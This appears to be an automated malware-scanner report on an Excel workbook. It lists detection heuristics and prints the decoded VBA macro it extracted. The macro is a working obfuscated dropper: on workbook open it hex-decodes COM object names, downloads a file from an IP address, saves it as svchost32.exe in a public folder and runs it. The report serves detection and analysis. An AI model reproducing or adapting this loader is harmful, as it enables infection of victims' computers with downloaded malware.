MALICIOUS
188
Risk Score
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4894 bytes |
SHA-256: 5ebd6f33ab467e73fedc8dc862313043d74a132e32cfab60652e88b65e6b2714 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Range("E2:E9").Select
Dim bpermttejpxwkhdzdvds
Selection.FormatConditions.AddDatabar
Dim pphipenpjmmxjntrwlno
Selection.FormatConditions(Selection.FormatConditions.Count).ShowValue = True
Dim eiiufsjqvcpgjrsmhwci
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
With Selection.FormatConditions(1)
.MinPoint.Modify newtype:= xlConditionValueAutomaticMin
.MaxPoint.Modify newtype:= xlConditionValueAutomaticMax
End With
With Selection.FormatConditions(1).BarColor
.Color = 8700771
.TintAndShade = 0
End With
Selection.FormatConditions(1).BarFillType = xlDataBarFillGradient
Selection.FormatConditions(1).Direction = xlContext
Selection.FormatConditions(1).NegativeBarFormat.ColorType = xlDataBarColor
Selection.FormatConditions(1).BarBorder.Type = xlDataBarBorderSolid
Selection.FormatConditions(1).NegativeBarFormat.BorderColorType = _
xlDataBarColor
With Selection.FormatConditions(1).BarBorder.Color
.Color = 8700771
.TintAndShade = 0
End With
Selection.FormatConditions(1).AxisPosition = xlDataBarAxisAutomatic
With Selection.FormatConditions(1).AxisColor
.Color = 0
.TintAndShade = 0
End With
With Selection.FormatConditions(1).NegativeBarFormat.Color
.Color = 255
.TintAndShade = 0
End With
With Selection.FormatConditions(1).NegativeBarFormat.BorderColor
.Color = 255
.TintAndShade = 0
End With
Range("C2").Select
ActiveCell.FormulaR1C1 = "2"
Range("D2").Select
ActiveCell.FormulaR1C1 = "2"
Range("E2").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = " = RC[-2]+RC[-1]"
Range("C2:E2").Select
Selection.AutoFill Destination:= Range("C2:E7"), Type:= xlFillDefault
Range("C2:E7").Select
Range("C7:E7").Select
Selection.AutoFill Destination:= Range("C7:E9"), Type:= xlFillDefault
Range("C7:E9").Select
Range("C9:E9").Select
Selection.AutoFill Destination:= Range("C9:E10"), Type:= xlFillDefault
Range("C9:E10").Select
Range("C10:E10").Select
Selection.AutoFill Destination:= Range("C10:E13"), Type:= xlFillDefault
Range("C10:E13").Select
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
Range("D3").Select
Set pphipenpjmmxjntrwlno = CreateObject(fmcizyxudlguufmjjnaw("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
ActiveCell.FormulaR1C1 = "5"
Set eiiufsjqvcpgjrsmhwci = CreateObject(fmcizyxudlguufmjjnaw("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
Range("C4").Select
vwugwgoruhjzjfianlrf = fmcizyxudlguufmjjnaw("68 74 74 70 3A 2F 2F 31 38 35 2E 33 33 2E 38 35 2E 35 32 2F 46 52 2F 42 44 4F 2D 31 32 31 38 2E 6A 70 67")
ActiveCell.FormulaR1C1 = "1"
geuxdamwomcriooggncw = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
Range("C5").Select
RUNCMD = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
ActiveCell.FormulaR1C1 = "2"
bpermttejpxwkhdzdvds.Open "G" + "E" + "T", vwugwgoruhjzjfianlrf, False
Range("D6").Select
bpermttejpxwkhdzdvds.send
ActiveCell.FormulaR1C1 = "5"
pphipenpjmmxjntrwlno.Type = 1
Range("D7").Select
ActiveCell.FormulaR1C1 = "8"
pphipenpjmmxjntrwlno.Open
Range("C8").Select
pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody
ActiveCell.FormulaR1C1 = "6"
Range("C10").Select
ActiveCell.FormulaR1C1 = "2"
Range("D10").Select
pphipenpjmmxjntrwlno.savetofile geuxdamwomcriooggncw, 2
eiiufsjqvcpgjrsmhwci.Run RUNCMD
ActiveCell.FormulaR1C1 = "3"
Range("C11").Select
ActiveCell.FormulaR1C1 = "6"
Range("D12").Select
ActiveCell.FormulaR1C1 = "9"
Range("C12").Select
End Sub
Public Function fmcizyxudlguufmjjnaw(ByVal yelhwsjcdgxzflhpeypp As String) As String
Dim mvbhcdhdgnsuwxriulhy As String
Dim itoiapedszqakutklugw As String
Dim qtoptlxxoeoygcosgsgn As Long
For qtoptlxxoeoygcosgsgn = 1 To Len(yelhwsjcdgxzflhpeypp)Step 3
mvbhcdhdgnsuwxriulhy = Chr$(Val(" & H" & Mid$(yelhwsjcdgxzflhpeypp, qtoptlxxoeoygcosgsgn, 2)))
itoiapedszqakutklugw = itoiapedszqakutklugw & mvbhcdhdgnsuwxriulhy
Next qtoptlxxoeoygcosgsgn
fmcizyxudlguufmjjnaw = itoiapedszqakutklugw
End Function
Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.